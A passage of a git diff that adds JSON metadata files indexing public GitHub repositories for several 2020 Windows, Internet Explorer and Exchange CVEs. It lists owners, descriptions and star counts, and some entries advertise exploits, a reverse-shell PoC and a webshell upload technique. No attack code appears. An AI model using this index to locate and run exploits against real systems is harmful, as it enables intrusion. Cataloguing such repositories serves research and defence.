"https:\/\/github.com\/wortell\/cve-2020-0618", + "description": "CVE-2020-0618 Honeypot", + "fork": false, + "created_at": "2020-02-18T16:17:19Z", + "updated_at": "2024-09-18T16:26:12Z", + "pushed_at": "2020-03-03T17:21:54Z", + "stargazers_count": 30, + "watchers_count": 30, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 30, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 491827717, + "name": "CVE-2020-0618", + "full_name": "itstarsec\/CVE-2020-0618", + "owner": { + "login": "itstarsec", + "id": 75014161, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75014161?v=4", + "html_url": "https:\/\/github.com\/itstarsec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/itstarsec\/CVE-2020-0618", + "description": "Melissa", + "fork": false, + "created_at": "2022-05-13T08:58:16Z", + "updated_at": "2022-07-27T06:01:37Z", + "pushed_at": "2022-05-13T08:59:26Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0624.json b/2020/CVE-2020-0624.json new file mode 100644 index 0000000000..99b7f6c8bb --- /dev/null +++ b/2020/CVE-2020-0624.json @@ -0,0 +1,33 @@ +[ + { + "id": 257905314, + "name": "CVE-2020-0624", + "full_name": "james0x40\/CVE-2020-0624", + "owner": { + "login": "james0x40", + "id": 63775297, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63775297?v=4", + "html_url": "https:\/\/github.com\/james0x40", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/james0x40\/CVE-2020-0624", + "description": "win32k use-after-free poc", + "fork": false, + "created_at": "2020-04-22T13:11:16Z", + "updated_at": "2024-08-12T20:00:35Z", + "pushed_at": "2020-04-22T13:11:27Z", + "stargazers_count": 70, + "watchers_count": 70, + "has_discussions": false, + "forks_count": 38, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 38, + "watchers": 70, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0668.json b/2020/CVE-2020-0668.json new file mode 100644 index 0000000000..6739d58d15 --- /dev/null +++ b/2020/CVE-2020-0668.json @@ -0,0 +1,188 @@ +[ + { + "id": 241809572, + "name": "CVE-2020-0668", + "full_name": "RedCursorSecurityConsulting\/CVE-2020-0668", + "owner": { + "login": "RedCursorSecurityConsulting", + "id": 61265565, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61265565?v=4", + "html_url": "https:\/\/github.com\/RedCursorSecurityConsulting", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RedCursorSecurityConsulting\/CVE-2020-0668", + "description": "Use CVE-2020-0668 to perform an arbitrary privileged file move operation.", + "fork": false, + "created_at": "2020-02-20T06:22:40Z", + "updated_at": "2024-11-28T15:21:59Z", + "pushed_at": "2020-02-20T11:03:18Z", + "stargazers_count": 212, + "watchers_count": 212, + "has_discussions": false, + "forks_count": 53, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 53, + "watchers": 212, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 243248025, + "name": "CVE-2020-0668", + "full_name": "Nan3r\/CVE-2020-0668", + "owner": { + "login": "Nan3r", + "id": 16438104, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16438104?v=4", + "html_url": "https:\/\/github.com\/Nan3r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Nan3r\/CVE-2020-0668", + "description": "CVE-2020-0668", + "fork": false, + "created_at": "2020-02-26T11:37:29Z", + "updated_at": "2024-08-12T19:58:08Z", + "pushed_at": "2020-06-02T13:21:26Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 6, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 243427813, + "name": "SysTracingPoc", + "full_name": "modulexcite\/SysTracingPoc", + "owner": { + "login": "modulexcite", + "id": 12729391, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12729391?v=4", + "html_url": "https:\/\/github.com\/modulexcite", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/modulexcite\/SysTracingPoc", + "description": "CVE-2020-0668 - Microsoft Windows Service Tracing Arbitrary File Move Local Privilege Escalation Vulnerability", + "fork": false, + "created_at": "2020-02-27T04:09:29Z", + "updated_at": "2024-09-25T09:59:05Z", + "pushed_at": "2020-02-26T09:24:45Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 23, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 23, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 422076432, + "name": "CVE-2020-0668", + "full_name": "ycdxsb\/CVE-2020-0668", + "owner": { + "login": "ycdxsb", + "id": 32149596, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32149596?v=4", + "html_url": "https:\/\/github.com\/ycdxsb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ycdxsb\/CVE-2020-0668", + "description": "Make CVE-2020-0668 exploit work for version < win10 v1903 and version >= win10 v1903", + "fork": false, + "created_at": "2021-10-28T05:30:14Z", + "updated_at": "2024-06-01T01:13:32Z", + "pushed_at": "2021-12-07T03:33:56Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 12, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 422947746, + "name": "CVE-2020-0668.exe", + "full_name": "bypazs\/CVE-2020-0668.exe", + "owner": { + "login": "bypazs", + "id": 5837953, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5837953?v=4", + "html_url": "https:\/\/github.com\/bypazs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bypazs\/CVE-2020-0668.exe", + "description": null, + "fork": false, + "created_at": "2021-10-30T17:28:54Z", + "updated_at": "2023-02-16T02:33:14Z", + "pushed_at": "2021-10-30T17:30:15Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 810761849, + "name": "Windows_Exploit", + "full_name": "0xSs0rZ\/Windows_Exploit", + "owner": { + "login": "0xSs0rZ", + "id": 53834222, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53834222?v=4", + "html_url": "https:\/\/github.com\/0xSs0rZ", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xSs0rZ\/Windows_Exploit", + "description": "CVE-2021-1675\/CVE-2021-34527 PrintNightmare & CVE-2020-0668", + "fork": false, + "created_at": "2024-06-05T10:01:18Z", + "updated_at": "2024-06-05T10:04:29Z", + "pushed_at": "2024-06-05T10:04:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0674.json b/2020/CVE-2020-0674.json new file mode 100644 index 0000000000..756eebb363 --- /dev/null +++ b/2020/CVE-2020-0674.json @@ -0,0 +1,126 @@ +[ + { + "id": 262167867, + "name": "CVE-2020-0674-Exploit", + "full_name": "maxpl0it\/CVE-2020-0674-Exploit", + "owner": { + "login": "maxpl0it", + "id": 27973683, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27973683?v=4", + "html_url": "https:\/\/github.com\/maxpl0it", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/maxpl0it\/CVE-2020-0674-Exploit", + "description": "This is an exploit for CVE-2020-0674 that runs on the x64 version of IE 8, 9, 10, and 11 on Windows 7.", + "fork": false, + "created_at": "2020-05-07T22:02:25Z", + "updated_at": "2024-09-25T21:11:59Z", + "pushed_at": "2020-05-15T09:03:36Z", + "stargazers_count": 221, + "watchers_count": 221, + "has_discussions": false, + "forks_count": 67, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 67, + "watchers": 221, + "score": 0, + "subscribers_count": 12 + }, + { + "id": 299851365, + "name": "CVE-2020-0674", + "full_name": "Ken-Abruzzi\/CVE-2020-0674", + "owner": { + "login": "Ken-Abruzzi", + "id": 68931768, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68931768?v=4", + "html_url": "https:\/\/github.com\/Ken-Abruzzi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ken-Abruzzi\/CVE-2020-0674", + "description": null, + "fork": false, + "created_at": "2020-09-30T08:08:42Z", + "updated_at": "2020-09-30T08:27:55Z", + "pushed_at": "2020-09-30T08:27:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 382522814, + "name": "CVE-2020-0674-PoC", + "full_name": "Neko-chanQwQ\/CVE-2020-0674-PoC", + "owner": { + "login": "Neko-chanQwQ", + "id": 83222283, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83222283?v=4", + "html_url": "https:\/\/github.com\/Neko-chanQwQ", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Neko-chanQwQ\/CVE-2020-0674-PoC", + "description": "随便放点自己弄的小东西", + "fork": false, + "created_at": "2021-07-03T04:17:35Z", + "updated_at": "2021-07-26T20:38:51Z", + "pushed_at": "2021-07-03T04:28:56Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 729798547, + "name": "Internet-Explorer-UAF", + "full_name": "Micky-Thongam\/Internet-Explorer-UAF", + "owner": { + "login": "Micky-Thongam", + "id": 107787739, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/107787739?v=4", + "html_url": "https:\/\/github.com\/Micky-Thongam", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Micky-Thongam\/Internet-Explorer-UAF", + "description": "Porting the CVE-2020-0674 exploit for Windows8.1 and Windows10", + "fork": false, + "created_at": "2023-12-10T11:52:48Z", + "updated_at": "2023-12-10T12:11:32Z", + "pushed_at": "2023-12-11T03:49:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0683.json b/2020/CVE-2020-0683.json new file mode 100644 index 0000000000..78910da8a3 --- /dev/null +++ b/2020/CVE-2020-0683.json @@ -0,0 +1,33 @@ +[ + { + "id": 239812937, + "name": "CVE-2020-0683", + "full_name": "padovah4ck\/CVE-2020-0683", + "owner": { + "login": "padovah4ck", + "id": 13963076, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13963076?v=4", + "html_url": "https:\/\/github.com\/padovah4ck", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/padovah4ck\/CVE-2020-0683", + "description": "CVE-2020-0683 - Windows MSI “Installer service” Elevation of Privilege", + "fork": false, + "created_at": "2020-02-11T16:42:34Z", + "updated_at": "2024-11-08T14:50:48Z", + "pushed_at": "2021-12-23T16:28:28Z", + "stargazers_count": 339, + "watchers_count": 339, + "has_discussions": false, + "forks_count": 58, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 58, + "watchers": 339, + "score": 0, + "subscribers_count": 9 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0688.json b/2020/CVE-2020-0688.json new file mode 100644 index 0000000000..12315a3890 --- /dev/null +++ b/2020/CVE-2020-0688.json @@ -0,0 +1,769 @@ +[ + { + "id": 243126851, + "name": "cve-2020-0688", + "full_name": "random-robbie\/cve-2020-0688", + "owner": { + "login": "random-robbie", + "id": 4902869, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4902869?v=4", + "html_url": "https:\/\/github.com\/random-robbie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/random-robbie\/cve-2020-0688", + "description": "cve-2020-0688", + "fork": false, + "created_at": "2020-02-25T23:44:16Z", + "updated_at": "2024-10-21T23:41:44Z", + "pushed_at": "2020-02-26T00:58:39Z", + "stargazers_count": 162, + "watchers_count": 162, + "has_discussions": false, + "forks_count": 52, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-0688" + ], + "visibility": "public", + "forks": 52, + "watchers": 162, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 243257176, + "name": "CVE-2020-0688", + "full_name": "Jumbo-WJB\/CVE-2020-0688", + "owner": { + "login": "Jumbo-WJB", + "id": 7954518, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7954518?v=4", + "html_url": "https:\/\/github.com\/Jumbo-WJB", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jumbo-WJB\/CVE-2020-0688", + "description": "CVE-2020-0688 - Exchange", + "fork": false, + "created_at": "2020-02-26T12:28:11Z", + "updated_at": "2024-11-01T02:37:51Z", + "pushed_at": "2020-02-27T03:50:07Z", + "stargazers_count": 66, + "watchers_count": 66, + "has_discussions": false, + "forks_count": 24, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 24, + "watchers": 66, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 243416592, + "name": "cve-2020-0688", + "full_name": "Ridter\/cve-2020-0688", + "owner": { + "login": "Ridter", + "id": 6007471, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6007471?v=4", + "html_url": "https:\/\/github.com\/Ridter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ridter\/cve-2020-0688", + "description": "cve-2020-0688", + "fork": false, + "created_at": "2020-02-27T02:54:27Z", + "updated_at": "2024-11-16T09:50:14Z", + "pushed_at": "2023-07-04T05:16:05Z", + "stargazers_count": 322, + "watchers_count": 322, + "has_discussions": false, + "forks_count": 86, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 86, + "watchers": 322, + "score": 0, + "subscribers_count": 10 + }, + { + "id": 243531424, + "name": "CVE-2020-0688_EXP", + "full_name": "Yt1g3r\/CVE-2020-0688_EXP", + "owner": { + "login": "Yt1g3r", + "id": 12625147, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12625147?v=4", + "html_url": "https:\/\/github.com\/Yt1g3r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Yt1g3r\/CVE-2020-0688_EXP", + "description": "CVE-2020-0688_EXP Auto trigger payload & encrypt method", + "fork": false, + "created_at": "2020-02-27T13:53:46Z", + "updated_at": "2024-09-05T09:58:48Z", + "pushed_at": "2020-02-27T15:57:53Z", + "stargazers_count": 142, + "watchers_count": 142, + "has_discussions": false, + "forks_count": 60, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "automation", + "cve-2020-0688", + "exchange", + "exploit" + ], + "visibility": "public", + "forks": 60, + "watchers": 142, + "score": 0, + "subscribers_count": 10 + }, + { + "id": 243640997, + "name": "CVE-2020-0688", + "full_name": "righter83\/CVE-2020-0688", + "owner": { + "login": "righter83", + "id": 12727740, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12727740?v=4", + "html_url": "https:\/\/github.com\/righter83", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/righter83\/CVE-2020-0688", + "description": "Exchange Scanner CVE-2020-0688", + "fork": false, + "created_at": "2020-02-27T23:55:04Z", + "updated_at": "2024-08-12T19:58:11Z", + "pushed_at": "2021-09-10T12:10:09Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 243672879, + "name": "cve-2020-0688", + "full_name": "truongtn\/cve-2020-0688", + "owner": { + "login": "truongtn", + "id": 11813006, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11813006?v=4", + "html_url": "https:\/\/github.com\/truongtn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/truongtn\/cve-2020-0688", + "description": "I made this script for conducting CVE-2020-0688 more rapidly. It helps to improve checking the vuln, reducing hugely steps for that", + "fork": false, + "created_at": "2020-02-28T03:47:40Z", + "updated_at": "2024-08-12T19:58:11Z", + "pushed_at": "2020-02-28T04:04:54Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 243801603, + "name": "CVE-2020-0688-Scanner", + "full_name": "onSec-fr\/CVE-2020-0688-Scanner", + "owner": { + "login": "onSec-fr", + "id": 59887731, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59887731?v=4", + "html_url": "https:\/\/github.com\/onSec-fr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/onSec-fr\/CVE-2020-0688-Scanner", + "description": "Quick tool for checking CVE-2020-0688 on multiple hosts with a non-intrusive method.", + "fork": false, + "created_at": "2020-02-28T16:04:30Z", + "updated_at": "2024-09-19T11:52:33Z", + "pushed_at": "2021-06-01T07:36:53Z", + "stargazers_count": 37, + "watchers_count": 37, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-0688", + "exchange", + "microsoft", + "pentesting" + ], + "visibility": "public", + "forks": 13, + "watchers": 37, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 243813543, + "name": "CVE-2020-0688", + "full_name": "youncyb\/CVE-2020-0688", + "owner": { + "login": "youncyb", + "id": 33374470, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33374470?v=4", + "html_url": "https:\/\/github.com\/youncyb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/youncyb\/CVE-2020-0688", + "description": "CVE-2020-0688", + "fork": false, + "created_at": "2020-02-28T17:03:53Z", + "updated_at": "2024-08-12T19:58:12Z", + "pushed_at": "2020-02-28T17:07:15Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 10, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 244149446, + "name": "CVE-2020-0688", + "full_name": "zcgonvh\/CVE-2020-0688", + "owner": { + "login": "zcgonvh", + "id": 25787677, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25787677?v=4", + "html_url": "https:\/\/github.com\/zcgonvh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zcgonvh\/CVE-2020-0688", + "description": "Exploit and detect tools for CVE-2020-0688", + "fork": false, + "created_at": "2020-03-01T12:57:32Z", + "updated_at": "2024-11-17T19:28:30Z", + "pushed_at": "2020-03-21T05:44:48Z", + "stargazers_count": 352, + "watchers_count": 352, + "has_discussions": false, + "forks_count": 79, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 79, + "watchers": 352, + "score": 0, + "subscribers_count": 9 + }, + { + "id": 245013193, + "name": "PSForgot2kEyXCHANGE", + "full_name": "justin-p\/PSForgot2kEyXCHANGE", + "owner": { + "login": "justin-p", + "id": 8249280, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8249280?v=4", + "html_url": "https:\/\/github.com\/justin-p", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/justin-p\/PSForgot2kEyXCHANGE", + "description": "PoC for Forgot2kEyXCHANGE (CVE-2020-0688) written in PowerShell", + "fork": false, + "created_at": "2020-03-04T22:02:30Z", + "updated_at": "2024-08-12T19:58:23Z", + "pushed_at": "2020-03-05T08:02:57Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 248554405, + "name": "CVE-2020-0688", + "full_name": "cert-lv\/CVE-2020-0688", + "owner": { + "login": "cert-lv", + "id": 22764485, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22764485?v=4", + "html_url": "https:\/\/github.com\/cert-lv", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cert-lv\/CVE-2020-0688", + "description": "Vulnerability scanner for CVE-2020-0688", + "fork": false, + "created_at": "2020-03-19T16:39:56Z", + "updated_at": "2022-11-09T18:06:47Z", + "pushed_at": "2020-03-19T16:41:39Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 251646716, + "name": "CVE-2020-0688", + "full_name": "ravinacademy\/CVE-2020-0688", + "owner": { + "login": "ravinacademy", + "id": 62107070, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62107070?v=4", + "html_url": "https:\/\/github.com\/ravinacademy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ravinacademy\/CVE-2020-0688", + "description": "Exploitation Script for CVE-2020-0688 \"Microsoft Exchange default MachineKeySection deserialize vulnerability\"", + "fork": false, + "created_at": "2020-03-31T15:29:52Z", + "updated_at": "2024-08-12T19:59:32Z", + "pushed_at": "2020-04-01T06:57:50Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 253240950, + "name": "Exploit_CVE-2020-0688", + "full_name": "mahyarx\/Exploit_CVE-2020-0688", + "owner": { + "login": "mahyarx", + "id": 7817627, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7817627?v=4", + "html_url": "https:\/\/github.com\/mahyarx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mahyarx\/Exploit_CVE-2020-0688", + "description": "CVE-2020-0688 \"Microsoft Exchange default MachineKeySection deserialize vulnerability\" ", + "fork": false, + "created_at": "2020-04-05T13:26:03Z", + "updated_at": "2024-08-12T19:59:45Z", + "pushed_at": "2020-04-05T13:33:10Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 257824792, + "name": "CVE-2020-0688", + "full_name": "ktpdpro\/CVE-2020-0688", + "owner": { + "login": "ktpdpro", + "id": 17905484, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17905484?v=4", + "html_url": "https:\/\/github.com\/ktpdpro", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ktpdpro\/CVE-2020-0688", + "description": "PoC RCE Reverse Shell for CVE-2020-0688", + "fork": false, + "created_at": "2020-04-22T07:28:32Z", + "updated_at": "2024-08-12T20:00:34Z", + "pushed_at": "2020-04-22T01:09:27Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 271748338, + "name": "cve-2020-0688-webshell-upload-technique", + "full_name": "w4fz5uck5\/cve-2020-0688-webshell-upload-technique", + "owner": { + "login": "w4fz5uck5", + "id": 32375656, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32375656?v=4", + "html_url": "https:\/\/github.com\/w4fz5uck5", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/w4fz5uck5\/cve-2020-0688-webshell-upload-technique", + "description": "cve-2020-0688 UNIVERSAL Python implementation utilizing ASPX webshell for command output", + "fork": false, + "created_at": "2020-06-12T08:28:35Z", + "updated_at": "2024-10-15T20:07:34Z", + "pushed_at": "2023-09-12T13:03:46Z", + "stargazers_count": 22, + "watchers_count": 22, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 22, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 288177224, + "name": "CVE-2020-0688", + "full_name": "murataydemir\/CVE-2020-0688", + "owner": { + "login": "murataydemir", + "id": 16391655, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16391655?v=4", + "html_url": "https:\/\/github.com\/murataydemir", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/murataydemir\/CVE-2020-0688", + "description": "[CVE-2020-0688] Microsoft Exchange Server Fixed Cryptographic Key Remote Code Execution (RCE)", + "fork": false, + "created_at": "2020-08-17T12:41:51Z", + "updated_at": "2024-08-12T20:04:49Z", + "pushed_at": "2020-08-29T21:00:56Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 306497480, + "name": "ecp_slap", + "full_name": "zyn3rgy\/ecp_slap", + "owner": { + "login": "zyn3rgy", + "id": 73311948, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73311948?v=4", + "html_url": "https:\/\/github.com\/zyn3rgy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zyn3rgy\/ecp_slap", + "description": "CVE-2020-0688 PoC", + "fork": false, + "created_at": "2020-10-23T01:18:13Z", + "updated_at": "2024-11-19T21:09:40Z", + "pushed_at": "2024-11-19T21:09:35Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 10, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 308367304, + "name": "CVE-2020-0688-Scanner", + "full_name": "SLSteff\/CVE-2020-0688-Scanner", + "owner": { + "login": "SLSteff", + "id": 20557573, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20557573?v=4", + "html_url": "https:\/\/github.com\/SLSteff", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SLSteff\/CVE-2020-0688-Scanner", + "description": "Scans for Microsoft Exchange Versions with masscan", + "fork": false, + "created_at": "2020-10-29T15:16:24Z", + "updated_at": "2021-03-20T06:54:20Z", + "pushed_at": "2020-10-29T20:06:25Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 326652424, + "name": "CVE-2020-0688", + "full_name": "MrTiz\/CVE-2020-0688", + "owner": { + "login": "MrTiz", + "id": 29025198, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29025198?v=4", + "html_url": "https:\/\/github.com\/MrTiz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MrTiz\/CVE-2020-0688", + "description": "Remote Code Execution on Microsoft Exchange Server through fixed cryptographic keys", + "fork": false, + "created_at": "2021-01-04T10:48:40Z", + "updated_at": "2024-11-15T22:39:55Z", + "pushed_at": "2021-06-06T16:03:53Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 20, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 363882684, + "name": "proxylogon", + "full_name": "ann0906\/proxylogon", + "owner": { + "login": "ann0906", + "id": 82447420, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82447420?v=4", + "html_url": "https:\/\/github.com\/ann0906", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ann0906\/proxylogon", + "description": 